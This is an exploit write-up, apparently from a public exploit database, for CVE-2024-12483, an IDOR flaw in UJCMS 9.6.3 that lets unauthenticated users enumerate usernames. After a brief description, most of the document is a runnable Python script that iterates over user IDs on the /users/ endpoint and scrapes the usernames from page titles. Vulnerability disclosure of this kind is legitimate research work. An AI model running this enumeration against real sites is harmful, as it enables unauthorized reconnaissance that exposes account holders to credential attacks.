# Exploit Title: UJCMS 9.6.3 User Enumeration via IDOR
# Exploit Author: Cyd Tseng
# Date: 11 Dec 2024
# Category: Web application
# Vendor Homepage: https://dromara.org/
# Software Link: https://github.com/dromara/ujcms
# Version: UJCMS 9.6.3
# Tested on: Linux
# CVE: CVE-2024-12483
# Advisory: https://github.com/cydtseng/Vulnerability-Research/blob/main/ujcms/IDOR-UsernameEnumeration.md

"""

An Insecure Direct Object Reference (IDOR) vulnerability was discovered in UJCMS version 9.6.3 that allows unauthenticated enumeration of usernames through the manipulation of the user id parameter in the /users/id endpoint. While the user IDs are generally large numbers (e.g., 69278363520885761), with the exception of the admin and anonymous account, unauthenticated attackers can still systematically discover usernames of existing accounts.

"""


import requests
from bs4 import BeautifulSoup
import time
import re

BASE_URL = 'http://localhost:8080/users/{}' # Modify as necessary!
HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Connection': 'keep-alive'
}

def fetch_user_data(user_id):
    url = BASE_URL.format(user_id)
    try:
        response = requests.get(url, headers=HEADERS)
        if response.status_code == 200:
            soup = BeautifulSoup(response.content, 'html.parser')
            title = soup.title.string.strip()
            if title.lower() != '404':
                username = re.sub(r' - UJCMS演示站$', '', title)
                return user_id, username
        return None
    except requests.RequestException as e:
        print(f"Error fetching data for user ID {user_id}: {e}")
        return None

def user_id_generator(start, end):
    for user_id in range(start, end + 1):
        yield user_id

def enumerate_users(start_id, end_id):
    for user_id in user_id_generator(start_id, end_id):
        user_data = fetch_user_data(user_id)
        if user_data:
            print(f"Valid user found: ID {user_data[0]} with username '{user_data[1]}'")
        time.sleep(0.1)

if __name__ == '__main__':
    start_id = int(input("Enter the starting user ID: "))
    end_id = int(input("Enter the ending user ID: "))
    print(f"Starting enumeration from ID {start_id} to {end_id}...")
    enumerate_users(start_id, end_id)